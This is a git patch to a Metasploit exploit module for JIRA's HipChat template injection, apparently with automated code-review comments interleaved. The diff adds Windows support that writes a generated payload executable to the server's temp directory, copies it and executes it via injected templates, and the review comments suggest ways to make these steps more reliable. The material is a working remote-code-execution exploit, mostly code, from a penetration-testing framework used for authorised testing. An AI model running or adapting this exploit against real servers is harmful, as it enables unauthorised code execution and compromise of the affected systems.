From f33e63c16f78f990d41bd76677b2a76de754ea3f Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 3 Dec 2015 14:02:32 -0600 Subject: [PATCH] Support Win/Linx/Java payloads for Win/Linux platforms --- .../unix/webapp/jira_hipchat_template.rb | 50 +++++++++++++++---- 1 file changed, 41 insertions(+), 9 deletions(-) diff --git a/modules/exploits/unix/webapp/jira_hipchat_template.rb b/modules/exploits/unix/webapp/jira_hipchat_template.rb index 2779873e3f..93c883b949 100644 --- a/modules/exploits/unix/webapp/jira_hipchat_template.rb +++ b/modules/exploits/unix/webapp/jira_hipchat_template.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote def do_explicit_check begin cookie = do_login - # I don't really care which command to execute, as long as it's a valid one. + # I don't really care which command to execute, as long as it's a valid one for both platforms. # If the command is valid, it should return {"message"=>"0"}. # If the command is not valid, it should return an empty hash. c = get_exec_code('whoami') @@ -382,7 +382,13 @@ class Metasploit3 < Msf::Exploit::Remote # @param new_fname [String] The new file # @return [String] def get_dup_file_code(fname, new_fname) - get_exec_code("cp #{fname} #{new_fname}") + if fname =~ /^\/[[:print:]]+/ + cp_cmd = "cp #{fname} #{new_fname}" + else + cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}" + end + + get_exec_code(cp_cmd) end @@ -431,7 +437,13 @@ class Metasploit3 < Msf::Exploit::Remote def target_platform_compat?(target_platform) - target.platform.names.grep(/#{target_platform}|java/i).empty? ? false : true + target.platform.names.each do |n| + if /^java$/i === n || /#{n}/i === target_platform + return true + end + end + + false end @@ -452,11 +464,7 @@ class Metasploit3 < Msf::Exploit::Remote c = get_temp_path_code res = inject_template(c, cookie) json = res.get_json_document - if json['message'] - return json['message'] - end - - '' + json['message'] || '' end def get_java_home_path(cookie) 
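Review bot: The platform switch in get_dup_file_code is driven by whether `fname` begins with `/` rather than by `target.platform`, and the regex uses `^`, which in Ruby anchors at a line start rather than the start of the string; `if fname =~ /\A\/[[:print:]]+/` is the intended anchor. If the file-name heuristic is deliberate so that a Java target can copy on either host OS, a comment above the `if` saying so would stop the next reader from "fixing" it back into a platform check. Both paths are also interpolated unquoted into `cp` / `copy`, so a temp directory containing a space would split the command; whether `"#{fname}"`-style quoting survives get_exec_code's tokenization is not visible here, but the `PROGRA~1` rewrite added in exploit_as_windows suggests the spaces problem is real.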
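Review bot: In target_platform_compat? each platform name `n` is interpolated into a regex unescaped and matched as a substring, so a name containing regex metacharacters, or one that is a prefix of another, would match more than intended; the names come from the module's own target table, so this is a robustness point rather than an injection one, but `Regexp.escape(n)` is free. The loop with an early `return true` is the shape of `any?`: `target.platform.names.any? { |n| n.casecmp('java').zero? || target_platform =~ /#{Regexp.escape(n)}/i }`. The match direction is also reversed from the removed line (the detected platform is now searched for the target's name instead of the other way round), and a one-line comment stating that a Java target is accepted on any detected platform would make that intent explicit.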
@@ -496,6 +504,30 @@ class Metasploit3 < Msf::Exploit::Remote def exploit_as_windows(cookie) + tmp_path = get_tmp_path(cookie) + + if tmp_path.blank? + fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) + exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") + exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") + exe_fname.gsub!(/Program Files/, 'PROGRA~1') + exe_new_fname.gsub!(/Program Files/, 'PROGRA~1') + register_files_for_cleanup(exe_fname, exe_new_fname) + + print_status("Attempting to write #{exe_fname}") + c = get_write_file_code(exe_fname, exe) + inject_template(c, cookie) + + print_status("New file will be #{exe_new_fname}") + c = get_dup_file_code(exe_fname, exe_new_fname) + inject_template(c, cookie) + + print_status("Executing #{exe_new_fname}") + c = get_exec_code(exe_new_fname) + inject_template(c, cookie) end @@ -542,7 +574,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Target being detected as: #{target_platform}") unless target_platform_compat?(target_platform) - fail_with(Failure::BadConfig, 'Selected target does not match the target.') + fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') end case target.name
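Review bot: In exploit_as_windows the responses of the three inject_template calls (write, copy, execute) are discarded, so a failed write or copy is never reported and the module goes on to announce it is executing a file that may not exist; do_explicit_check already relies on the template answering with a `message` key and an empty hash on failure, so the same check can gate each step, e.g. `res = inject_template(c, cookie)` followed by `fail_with(Failure::Unknown, 'Payload write failed') if res.nil? || res.get_json_document.empty?` — assuming the write and copy templates answer in the same shape as the exec one, which is not visible here. The `gsub!(/Program Files/, 'PROGRA~1')` rewrite is fragile: it yields `PROGRA~1 (x86)` for a `Program Files (x86)` temp directory and fails outright on volumes where 8.3 short-name generation is disabled, so quoting the path in the command is the more robust route if get_exec_code's tokenization permits it. A short comment explaining why the payload is written under one name and then copied to a second before execution would also help, since the reason for the extra copy step is not apparent from the code.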